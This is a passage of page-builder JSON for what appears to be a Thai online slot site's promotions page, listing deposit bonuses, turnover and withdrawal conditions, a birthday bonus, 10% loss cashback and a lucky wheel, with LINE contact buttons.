\\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3e9ff8e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_get_200_7turn_-_Megabet333-Biz.webp\",\"id\":157,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"b25769f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Free_bonus_100_-_Megabet333-Biz.webp\",\"id\":158,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"498b0c4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/HBD_-_Megabet333-Biz.webp\",\"id\":159,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d72c4a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Reward_10_-_Megabet333-Biz.webp\",\"id\":160,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"879b024\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Lucky_wheel_-_Megabet333-Biz.webp\",\"id\":156,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 